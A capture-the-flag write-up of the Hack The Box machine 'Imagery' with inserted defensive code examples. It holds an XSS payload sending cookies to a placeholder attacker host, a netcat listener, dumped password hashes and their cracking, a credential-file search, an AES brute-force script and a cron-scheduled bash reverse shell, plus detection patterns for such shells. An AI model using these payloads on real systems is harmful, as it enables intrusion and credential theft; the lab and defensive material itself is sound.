
Imagery - path traverse

```
 _|. _ _  _  _  _ _|_    v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/htb/machines/Imagery/reports/_10.10.11.88_8000/_25-10-07_12-41-40.txt

Target: http://10.10.11.88:8000/

[12:41:41] Starting:
[12:42:23] 401 - 59B - /images
[12:42:30] 405 - 153B - /login
[12:42:31] 405 - 153B - /logout
[12:42:41] 405 - 153B - /register
[12:42:48] 401 - 32B - /uploads/affwp-debug.log
[12:42:48] 401 - 32B - /uploads/dump.sql

Task Completed
```
After trying a few malicious payloads in the input, it turns out the input field on this page is vulnerable to XSS; the admin's cookie can be captured with the payload below.

```html
<img src=x onerror="document.location='http://<ATTACK_MACHINE_IP>:<PORT>/?cookie='+document.cookie">
```

Before injecting, start netcat so the incoming request can be captured.

```bash
nc -lnvp 80
```
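Added example (not code from the writeup or from the Imagery application): the two server-side controls that would have neutralized this payload are context-aware output encoding and an HttpOnly session cookie. The hypothetical Python below renders a constructed user-supplied value both unescaped and escaped, and builds a session Set-Cookie header with the flags a defender expects; the function names and the sample input are assumptions.

```python
import html
import re
from http.cookies import SimpleCookie

# Constructed sample input: the same image-tag/onerror shape as the payload above,
# with a harmless alert instead of an exfiltration URL.
USER_INPUT = '<img src=x onerror="alert(document.cookie)">'

def render_unsafe(value: str) -> str:
    """Vulnerable pattern: user data concatenated straight into the HTML response."""
    return f"<p>Report: {value}</p>"

def render_safe(value: str) -> str:
    """Hardened pattern: HTML-escape the value (including quotes) before it reaches the markup."""
    return f"<p>Report: {html.escape(value, quote=True)}</p>"

# Crude check used only to show the difference: is there still a live tag inside our <p>?
TAG_RE = re.compile(r"<\s*[a-zA-Z]")

def contains_html_tag(rendered: str) -> bool:
    inner = rendered[len("<p>Report: "):-len("</p>")]  # strip the wrapper we added ourselves
    return TAG_RE.search(inner) is not None

def session_cookie_header(token: str) -> str:
    """Session cookie that document.cookie cannot read (HttpOnly), sent only over TLS (Secure)."""
    c = SimpleCookie()
    c["session"] = token
    c["session"]["httponly"] = True
    c["session"]["secure"] = True
    c["session"]["samesite"] = "Strict"
    c["session"]["path"] = "/"
    return c.output(header="").strip()

if __name__ == "__main__":
    print(render_unsafe(USER_INPUT))
    print(render_safe(USER_INPUT))
    print(session_cookie_header("constructed-session-token"))
```

Escaping neutralizes the tag in an HTML text context; the HttpOnly flag is the second layer, so that even an injection that does land cannot read the session token through `document.cookie`.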


```json
{
  "users": [
    {
      "username": "admin@imagery.htb",
      "password": "5d9c1d507a3f76af1e5c97a3ad1eaa31",
      "isAdmin": true,
      "displayId": "a1b2c3d4",
      "login_attempts": 0,
      "isTestuser": false,
      "failed_login_attempts": 0,
      "locked_until": null
    },
    {
      "username": "testuser@imagery.htb",
      "password": "2c65c8d7bfbca32a3ed42596192384f6",
      "isAdmin": false,
      "displayId": "e5f6g7h8",
      "login_attempts": 0,
      "isTestuser": true,
      "failed_login_attempts": 0,
      "locked_until": null
    }
  ],
  "images": [],
  "image_collections": [
    {
      "name": "My Images"
    },
    {
      "name": "Unsorted"
    },
    {
      "name": "Converted"
    },
    {
      "name": "Transformed"
    }
  ],
  "bug_reports": []
}
```
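Added example, not part of the writeup: the `password` values above are 32 hex characters and fall to hashcat mode 0, i.e. unsalted MD5, which is why a wordlist recovers them in seconds. The hypothetical Python below audits a dump with this field layout (constructed sample, no real credentials) for that weakness and shows the migration to salted PBKDF2-HMAC-SHA256 with `hashlib`; the function names, record format and iteration count are assumptions.

```python
import hashlib
import hmac
import json
import os
import re

# Anything that is exactly 32 lowercase hex characters is treated as a bare MD5 digest
UNSALTED_MD5_RE = re.compile(r"^[0-9a-f]{32}$")
PBKDF2_ITERATIONS = 600_000  # assumption: iteration count chosen for this example

def hash_password(password: str, salt: bytes = b"") -> str:
    """Salted PBKDF2-HMAC-SHA256, stored as pbkdf2$<iterations>$<salt hex>$<digest hex>."""
    salt = salt or os.urandom(16)  # fresh random salt per user
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"

def verify_password(password: str, stored: str) -> bool:
    """Constant-time comparison against a pbkdf2$ record; anything else fails closed."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2":
        return False
    _, iterations, salt_hex, digest_hex = parts
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)

def find_unsalted_md5(dump_json: str) -> list:
    """Audit: usernames in a dump with this layout whose password field is a bare MD5 digest."""
    data = json.loads(dump_json)
    return [u["username"] for u in data["users"] if UNSALTED_MD5_RE.match(u["password"])]

def rehash_on_login(user: dict, password: str) -> bool:
    """Transparent migration: a user still on MD5 gets a PBKDF2 record on the next successful login."""
    stored = user["password"]
    if UNSALTED_MD5_RE.match(stored):
        if not hmac.compare_digest(hashlib.md5(password.encode()).hexdigest(), stored):
            return False
        user["password"] = hash_password(password)
        return True
    return verify_password(password, stored)

# Constructed sample dump with the same field names as the file above (dummy values only)
SAMPLE_DUMP = json.dumps({
    "users": [
        {"username": "admin@example.test", "password": hashlib.md5(b"dummy-admin").hexdigest(), "isAdmin": True},
        {"username": "user@example.test", "password": hashlib.md5(b"dummy-user").hexdigest(), "isAdmin": False},
        {"username": "migrated@example.test", "password": hash_password("dummy-migrated"), "isAdmin": False},
    ],
    "images": [],
})

if __name__ == "__main__":
    print("users still on unsalted MD5:", find_unsalted_md5(SAMPLE_DUMP))
```

The audit is cheap to run against a backup before it is shipped off-box, and the rehash-on-login path means the migration completes without forcing a password reset.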

Crack the hash

```
lika@learning:~/Downloads/CVE-2024-8353$ nano token.txt
lika@learning:~/Downloads/CVE-2024-8353$ hashcat -a 0 -m 0 "2c65c8d7bfbca32a3ed42596192384f6" /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 1810/3685 MB (512 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
```

The password is iambatman.

Log in, get RCE through the image crop feature, and get a shell on the Linux box. Found the password. Then look for interesting files with:

```bash
find / \( -iname "*id_rsa" -o -iname "*db" -o -iname "*sql" -o -iname "*key" -o -iname "*pem" -o -iname "*backup" -o -iname "*bak" -o -iname "*conf" \) 2>/dev/null
```

```python
import pyAesCrypt
import sys

def decrypt(encrypted_file, password):
    # pyAesCrypt raises on a wrong password, so a clean return means the password is correct
    try:
        pyAesCrypt.decryptFile(
            encrypted_file,
            "web_20250806_120723.zip",
            password,
            256 * 1024  # buffer size
        )
        return True
    except Exception:
        return False

# Read the wordlist
with open('/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt', 'r', encoding='latin-1') as f:
    for line in f:
        password = line.strip()
        print(f"Trying: {password}", end='\r')

        if decrypt('web_20250806_120723.zip.aes', password):
            print(f"\n[+] Password found: {password}")
            sys.exit(0)

print("\n[-] Password not found")
```

```
bash-5.2$ find / \( -iname "*id_rsa" -o -iname "*db" -o -iname "*sql" -o -iname "*key" -o -iname "*pem" -o -iname "*backup" -o -iname "*bak" -o -iname "*conf" \) 2>/dev/null
/var/backup
/var/cache/debconf
/var/cache/man/ro/index.db
/var/cache/man/sr/index.db
/var/cache/man/fr/index.db
...............
```

Decrypt the backup:

```bash
pyAesCrypt -d web_20250806_120723.zip.aes -o web_20250806_120723.zip -p 'be******ds'
```

Crack the password

```
01c3d2e5bdaf6134cec0a367cf53e535:supersmash
```

```bash
sudo /usr/local/bin/charcol shell

# inside the charcol shell:
auto add --schedule "* * * * *" --command "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.14/4444 0>&1'" --name "RevShell"
```
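Added example, not from the writeup: the privilege escalation works because a sudo-permitted scheduler will run an arbitrary command as root every minute, and the right fix is not to grant sudo to a tool that schedules commands. On the detection side, the command line itself is easy to spot. The hypothetical Python below scans constructed crontab-style entries (one modelled on the command above, with a documentation-range placeholder address) for the interactive-shell-over-network pattern and for jobs that run every minute; function names and sample entries are assumptions.

```python
import re

# Constructed sample entries in five-field crontab style: "<schedule> <command>"
SAMPLE_JOBS = [
    "0 2 * * * /usr/local/bin/backup.sh --rotate",
    "*/15 * * * * /usr/bin/python3 /opt/app/cleanup.py",
    "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.0.2.10/4444 0>&1'",  # placeholder address
    "* * * * * /usr/bin/find /tmp -mtime +1 -delete",
]

# Indicators of an interactive shell wired to a network socket (the shape used above)
REVSHELL_PATTERNS = [
    (re.compile(r"/dev/(tcp|udp)/"), "bash network redirection"),
    (re.compile(r"\bbash\s+-i\b"), "interactive bash"),
    (re.compile(r">&\s*/dev/|0>&1"), "stdio redirected to a socket"),
]

def split_cron(entry: str):
    """Split a five-field cron line into (schedule, command)."""
    parts = entry.split(None, 5)
    if len(parts) < 6:
        raise ValueError(f"not a five-field cron entry: {entry!r}")
    return " ".join(parts[:5]), parts[5]

def classify(entry: str) -> dict:
    schedule, command = split_cron(entry)
    reasons = [label for pattern, label in REVSHELL_PATTERNS if pattern.search(command)]
    every_minute = schedule == "* * * * *"
    return {
        "entry": entry,
        "every_minute": every_minute,
        "reasons": reasons,
        # Shell-over-network indicators are high; an every-minute job with none is worth a look
        "severity": "high" if reasons else ("low" if every_minute else "none"),
    }

def suspicious_jobs(entries) -> list:
    """Return classifications for every entry that is not plainly benign."""
    return [c for c in (classify(e) for e in entries) if c["severity"] != "none"]

if __name__ == "__main__":
    for finding in suspicious_jobs(SAMPLE_JOBS):
        print(finding["severity"], finding["reasons"], "->", finding["entry"])
```

Run the same classifier over the output of a scheduler's job list on a schedule of its own, and alert on any high finding; a job that a non-root user created through a sudo-allowed tool is exactly the case this catches.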